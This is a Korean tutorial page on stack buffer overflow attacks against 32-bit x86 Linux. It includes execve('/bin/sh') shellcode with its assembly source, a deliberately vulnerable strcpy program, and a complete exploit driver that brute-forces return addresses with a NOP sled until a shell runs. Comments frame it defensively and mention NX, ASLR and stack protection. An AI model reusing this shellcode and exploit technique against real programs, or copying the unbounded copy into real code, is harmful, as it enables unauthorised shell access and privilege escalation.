Buffer over flow 공격에 대한 이해

Buffer over flow 공격에 대한 이해

  • 작성자
    조재혁(Mminzkn@minzkn.com)

  • 고친과정
    2004년 12월 4일 : 처음씀

준비

여기서 sample() 함수가 overflow exec shell 코드이고요. 이건 이미 공식화된 코드이기 때문에 제가 조금 양념을 쳐서 이해하기 쉽게 만들어 본겁니다. 해킹은 무지 싫어하지만 이런것도 명확히 알아둬야 자신의 코드가 튼튼해질겁니다. 절대로 BOF(Buffer Over Flow)당할 코드는 만들지 마세요. 이글을 읽고서도 BOF취약 코드 만드는 사람은 바보~

아래와 같은 코드를 만들기 위해서는 다음과 같은 단계를 진행하여 코드를 만듭니다.

  1. sample() 함수를 만든다.

    조건: 스트링 함수를 공격하기 위한 코드이므로 반드시 코드내에는 0x00 이 없어야 합니다. 그래서 strcpy 에 의해서 공격코드가 복사될수 있겠지요. 원리: 일단 jmp 로 call 함수로 분기토록 틀을 만듭니다. 이때 near 가 아닌 short 형태의 분기여야 합니다. 이제 call 바로 하단에는 "/bin/sh\0" 을 넣는것이고 이것은 call 에 의해서 그 주소를 챙길수 있습니다. 그래서 call 로 분기후 popl 을 통해서 "/bin/sh" 의 주소를 얻어냅니다. 그 다음에는 execve(System call 0x0b번)을 이용해서 실행하는 코드를 생성합니다. 역시 주의할점은 기계어상태에서 0x00이 있으면 안됩니다. 그리고 execve실행후 종료토록 exit(System call 0x01번)을 호출하여 종료시킵니다.

  2. 이제 일단 컴파일만 합니다.

  3. objdump -D <목적파일.o> 를 사용하여 코드를 역 어셈블한 상태를 확인합니다. 여기서 sample 라벨을 찾아서 stack frame 을 빼고 jmp 부터 복사하여 배열을 만듭니다.

  4. 이제 sample 함수는 mz_shell_code 로 만들어 진 상태이고 실제 테스트를 위한 함수를 만들어야 합니다. (실제 공격코드에는 bof() 함수가 아니라 프로그램 자체의 버퍼오버플로우 취약점이 될겁니다.)

  5. 이제 bof() 함수에는 한개의 dword 변수를 선언하고 이 주소를 취하여 dword 변수 자체 크기 4를 더하고 그로부터 다시 stack frame 을 건너뛰기 위해서 4를 더한 위치에 mz_shell_code 의 주소를 저장합니다.

  6. 이제 bof 함수는 버퍼오버플로우에 의해서 공격당한 함수의 전형적인 상태가 되었습니다.

  7. bof 가 리턴되면 mz_shell_code 로 분기하게 되고 원하는 /bin/sh 가 실행되며 이로서 권한을 취득합니다.

참고로 execve system call 의 내용은 다음과 같습니다.
%%eax = 0x0b
%%ebx = path/filename 포인터
%%ecx = 인자 리스트 포인터
%%edx = 환경변수 리스트 포인터
int $0x80


그리고 exit system call 의 내용은 다음과 같습니다.
%%eax = 0x01
%%ebx = exit code(return code)
int $0x80


/*
Copyright (c) Information Equipment co.,LTD.
All right reserved
Code by JaeHyuk Cho <mailto:minzkn@infoeq.com>

CVSTAG="$Header: /home/httpd/kldp/wiki/data/text/RCS/BufferOverFlow,v 1.6 2008/06/25 06:52:15 kss Exp kss $"
*/

/*
 * Machine code for 32-bit x86 Linux kept as data; every string fragment is
 * annotated with the instruction it encodes.  Going by the register setup
 * shown (int $0x80 with %al = 0x0b, then with %al = 0x01) it issues execve on
 * the trailing "/bin/sh" string and then exit.
 *
 * Defensive note: the code stores values relative to the address of its own
 * trailing string and is entered by jumping into this array, so it can only
 * run where the memory holding the array is both writable and executable.
 * With non-executable data and stack pages (NX/DEP, W^X) the jump faults
 * instead of running.
 */
char __mz_shell_code__[] = {
"\xeb\x1d"               /* jmp    0f               */
                          /* 1:                      */
"\x5e"                   /* pop    %esi             */               /* after the call, %esi holds the address of "/bin/sh" */
"\x89\x76\x08"           /* mov    %esi,0x8(%esi)   */
"\x31\xc0"               /* xor    %eax,%eax        */
"\x88\x46\x07"           /* mov    %al,0x7(%esi)    */
"\x89\x46\x0c"           /* mov    %eax,0xc(%esi)   */
"\xb0\x0b"               /* mov    $0x0b,%al        */
"\x89\xf3"               /* mov    %esi,%ebx        */
"\x8d\x4e\x08"           /* lea    0x8(%esi),%ecx   */
"\x31\xd2"               /* xor    %edx,%edx        */
"\xcd\x80"               /* int    $0x80            */
"\xb0\x01"               /* mov    $0x1,%al         */       /* exit system call part */
"\x31\xdb"               /* xor    %ebx,%ebx        */
"\xcd\x80"               /* int    $0x80            */
                          /* 0:                      */
"\xe8\xde\xff\xff\xff"   /* call   1b               */
"/bin/sh"
};

/*
 * Test helper: puts its own stack frame into the state a function is in after
 * a stack buffer overflow has replaced its return address.
 *
 * The write goes outside the s_Entry object, which is undefined behaviour in
 * C.  The offset arithmetic assumes s_Entry sits directly below one
 * pointer-sized saved-frame slot and that the return address follows it; that
 * depends on the compiler, optimisation level and options such as stack
 * protection, none of which this file controls.
 */
void bof(void)
{ /* Simulates, for testing only, a function that has already been hit by a buffer overflow */
volatile unsigned long s_Entry;
/* Address of s_Entry, plus its own size, plus one pointer-sized slot (the "frame" slot). */
s_Entry = (unsigned long)(&s_Entry) + sizeof(s_Entry) + sizeof(void *)/* frame */;
/* Store the address of the byte array in the slot computed above. */
*((unsigned long *)s_Entry) = (unsigned long)(&__mz_shell_code__);
}

#if 0 /* __mz_shell_code__ source : this is the assembly the BOF byte array was derived from. */
/*
 * Compiled out by the surrounding #if 0; kept as the readable source of the
 * byte array.  The nop statements before and after the main asm block look
 * like markers for locating it in a disassembly (assumption, not stated in
 * the code).
 *
 * NOTE(review): this source embeds "/bin/bash" while the byte array in this
 * file ends in "/bin/sh", so the two are not byte-for-byte the same listing.
 */
void sample(void)
{
__asm__ volatile("nop\n\t");
__asm__ volatile(
  "jmp 0f\n\t"
  "1:\n\t"
  "popl %%esi\n\t"
  "movl %%esi, 0x08(%%esi)\n\t"
  "xorl %%eax, %%eax\n\t"
  "movb %%al, 0x07(%%esi)\n\t"
  "movl %%eax, 0x0c(%%esi)\n\t"
  "movb $0x0b, %%al\n\t"
  "movl %%esi, %%ebx\n\t"
  "leal 0x08(%%esi), %%ecx\n\t"
  "xorl %%edx, %%edx\n\t"
  "int $0x80\n\t"
  "movb $0x01, %%al\n\t"
  "xorl %%ebx, %%ebx\n\t"
  "int $0x80\n\t"
  "0:\n\t"
  "call 1b\n\t"
  ".string \"/bin/bash\"\n\t"
  :
  :
);
__asm__ volatile("nop\n\t");
}
#endif 

int main(void)
{
    /* Entry point of the self-contained demonstration: it only invokes bof(). */
    bof();

    return 0;
}


실제 공격패턴

실제로 공격이 어떻게 이루어지는지 직접 경험해봐야 자신의 코드를 더 튼튼히 할수 있을겁니다. 꼭 한번 실습해보시고 보안의 중요성을 인지하시게 되었으면 좋겠습니다. 자! 보안에 대해서 별로 신경쓰지 않는 어떤 사람이 다음과 같은 코드를 생성하였다고 합시다. (실제상황에서는 복잡한 프로그램이겠지만 대충 다음과 같은 상황이 취약합니다.)
/* 
 Code by fooman
*/

#include <stdio.h>
#include <string.h>

/*
 * Deliberately vulnerable example: this is the program the rest of the page
 * uses as its target, so the code is left as the author wrote it.
 *
 * The defect is a stack-based buffer overflow (CWE-121): s_Message holds
 * 8 bytes and strcpy() copies the first command-line argument into it with no
 * length check, so any argument of 8 or more characters writes past the end
 * of the array.
 *
 * In real code, reject or bound the input before copying, for example by
 * checking strlen(s_Argv[1]) < sizeof(s_Message), or by using
 * snprintf(s_Message, sizeof(s_Message), "%s", s_Argv[1]).  Here the copy is
 * not needed at all: the argument could be written to stdout directly.
 */
int main(int s_Argc, char *s_Argv[])
{
 char s_Message[ 8 ]; /* fixed 8-byte stack buffer */
 if(s_Argc <= 1)
 {
  fprintf(stdout, "Usage: %s <Message>\n", s_Argv[0]);
  return(0);
 }
 /* Unbounded copy of caller-controlled data into the 8-byte buffer: the vulnerability. */
 strcpy(s_Message, s_Argv[1]);
 fputs(s_Message, stdout);
 return(0);
}

/* End of source */


자! 위의 코드를 일단 test1.c 로 저장하고 test1 이라는 실행파일을 만듭니다. 이제 이것은 공격의 대상입니다. 그럼 공격코드를 만들어 보겠습니다. (이것이 실전에서 쓰이는 공격기법입니다. 자세히 관찰해보세요.)
/*  
 Code by JaeHyuk Cho <mailto:minzkn@infoeq.com>
 Attack code
*/

#include <sys/types.h>
#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEF_ATTACK_PROGRAM      "./test1"
#define DEF_ATTACK_RANGE        (4 << 10) /* scan range to use: per the author, the larger the target, the more this value has to be raised */
#define DEF_TARGET_ARRAY_SIZE   (8) /* s_Message in test1.c is 8 bytes; the author notes this value has to be found by experiment */

/*
 * Same byte sequence as the array in the first listing on this page, with an
 * explicit "\x00" appended after "/bin/sh" (in addition to the terminator the
 * string literal already supplies).  Each fragment is annotated with the
 * 32-bit x86 instruction it encodes.
 */
char __mz_shell_code__[] = {
 "\xeb\x1d"               /* jmp    0f               */
                          /* 1:                      */
 "\x5e"                   /* pop    %esi             */
 "\x89\x76\x08"           /* mov    %esi,0x8(%esi)   */
 "\x31\xc0"               /* xor    %eax,%eax        */
 "\x88\x46\x07"           /* mov    %al,0x7(%esi)    */
 "\x89\x46\x0c"           /* mov    %eax,0xc(%esi)   */
 "\xb0\x0b"               /* mov    $0x0b,%al        */
 "\x89\xf3"               /* mov    %esi,%ebx        */
 "\x8d\x4e\x08"           /* lea    0x8(%esi),%ecx   */
 "\x31\xd2"               /* xor    %edx,%edx        */
 "\xcd\x80"               /* int    $0x80            */
 "\xb0\x01"               /* mov    $0x1,%al         */
 "\x31\xdb"               /* xor    %ebx,%ebx        */
 "\xcd\x80"               /* int    $0x80            */
                          /* 0:                      */
 "\xe8\xde\xff\xff\xff"   /* call   1b               */
 "/bin/sh"
 "\x00"
};

/*
 * Demonstration driver for the vulnerable test1 program on this page.  It
 * builds one over-long argument and runs the target in a child process once
 * per candidate address, waiting for each child before trying the next.  The
 * do/while(1) loop has no exit, so the "Bye." message and the return after it
 * are never reached.
 *
 * What this depends on, from a defender's point of view:
 *  - the target's stack lying at almost the same address as this process's
 *    own stack (the first candidate is derived from &s_Address), which
 *    address-space layout randomisation removes;
 *  - the target's stack being executable, which non-executable stack/NX
 *    removes;
 *  - the target having been built without stack protection and with the
 *    8-byte buffer layout assumed by DEF_TARGET_ARRAY_SIZE + 4.
 *
 * Detection: a run like this appears as a rapid series of short-lived child
 * processes of one binary that mostly end in a crash, which crash reports or
 * process accounting would record.
 */
int main(void)
{
 unsigned long s_Address; /* note that this is the first stack variable */
 char s_Arg[ DEF_TARGET_ARRAY_SIZE + 4 + sizeof(unsigned long) + sizeof(__mz_shell_code__) ];
 char *s_Exec[] = { DEF_ATTACK_PROGRAM, (char *)(&s_Arg[0]), (char *)0 };

 /* fill the leading bytes with nop (0x90), which the author uses to make execution more likely */
 memset(&s_Arg[0], 0x90 /* nop */, DEF_TARGET_ARRAY_SIZE + 4);

 /* copy the shell-executing machine code */
 memcpy((void *)(&s_Arg[DEF_TARGET_ARRAY_SIZE + 4 + sizeof(unsigned long)]), (void *)(&__mz_shell_code__[0]), sizeof(__mz_shell_code__));

 s_Address = (unsigned long)(&s_Address) - DEF_ATTACK_RANGE; /* initial scan address */
 do
 { /* this loop keeps running; each pass tries one candidate address */
  fprintf(stdout, "ATTACK INFO : >> %08lXH <<\n", s_Address);
  *((unsigned long *)(&s_Arg[DEF_TARGET_ARRAY_SIZE + 4])) = s_Address;
  if(fork() == 0)
  {
   execvp(s_Exec[0], s_Exec);
   exit(0);
  }
  else wait(0);
  s_Address += sizeof(unsigned long);
 }while(1);

 fprintf(stdout, "\n\nBye.\n");

 return(0);
}

/* End of source */


이제 위의 코드를 test2.c 로 저장하고 test2로 실행파일을 만들고 test2 를 test1 이 있는곳 에서 실행합니다. 경우에 따라서 실패를 하기도 하지만 아마도 대부분 조금있다가 쉘이 실행되는 것을 볼수 있을겁니다. 컴파일은 다음과 같이 합니다.
# Builds the two demo programs, test1 and test2, from their .c files.
# Objects are compiled with -O0 -Wall -Werror and linked with -s (strip symbols).
# No hardening options are requested here.  For real software, options such as
# -fstack-protector-strong, -D_FORTIFY_SOURCE=2 (needs optimisation enabled) and
# a position-independent executable (-fPIE -pie) address the class of bug
# shown on this page.
all: test1 test2
clean: ;$(RM) *.o test1 test2
test1: test1.o ;gcc -s -o $@ $^
test2: test2.o ;gcc -s -o $@ $^
%.o:%.c ;gcc -O0 -Wall -Werror -c -o $@ $<

last modified 2008-06-25 15:52:15